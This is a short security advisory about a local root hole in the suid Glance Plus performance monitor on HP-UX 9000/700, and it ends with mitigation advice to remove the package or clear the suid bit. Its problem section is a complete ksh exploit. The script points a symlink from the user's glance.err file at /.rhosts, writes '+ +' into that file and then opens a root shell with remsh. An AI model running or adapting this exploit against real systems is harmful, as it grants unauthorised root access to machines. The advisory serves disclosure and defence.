COMMAND

    /usr/perf/bin/glance

SYSTEMS AFFECTED

    HP 9000/700

PROBLEM
    Here's the exploit code:

    #!/bin/ksh
    # exploit to work against the latest rev that I know of for glance+
    # Tested on 9000/700.. Don't even know if it's available on 10.X

    if [ ! -x /usr/perf/bin/glance ]
    then
      echo 'No diablo programme.'
      echo 'Que si como es que.'
      exit
    fi

    PATH=/usr/perf/bin:/bin:/usr/bin:$PATH
    echo 'Please wait for about 10 seconds, or somewhere around that, anyway.'
    sleep 3
    cp /.rhosts /tmp/rhosts-save
    ln -s /.rhosts ~/glance.err
    glance -j 1 -f ';><:/?*&^${KILLME}' -iterations 1 -maxpages 1
    echo '+ +' > /.rhosts
    if [ -f /tmp/rhosts-save ]
    then
      cat /tmp/rhosts-save >> /.rhosts
      rm /tmp/rhosts-save
    fi
    #rm ~/glance.err # This goes away?  Why does this go away?
    chmod 666 /.rhosts
    chown root /.rhosts
    remsh localhost -l root /bin/ksh -i

SOLUTION

    Glance Plus  is a  performance monitor  that is  included in  most
    HP-UX system installations as a  demo package or can be  purchased
    separately.  If  you  do  not   need  to  do  system   performance
    monitoring, you  should remove  this whole  package which includes
    all the  files in  /usr/perf. An  earlier problem  with Glance was
    covered in  the HP  Security Advisory  9405-011 which  describes a
    patch that updates Glance to version B.09.01 (700-800) or  A.09.07
    (300,  400).   The  current  vulnerability  is  not fixed by these
    updates.  If you need to keep this package, you should change  the
    permissions of  all the  files in  /usr/perf to  owner only access
    and clear the suid  bit. Check that the  files are owned by  root.
    Normal users will no  longer be able to  use this program but  the
    system manager will be able to do so when logged in as root.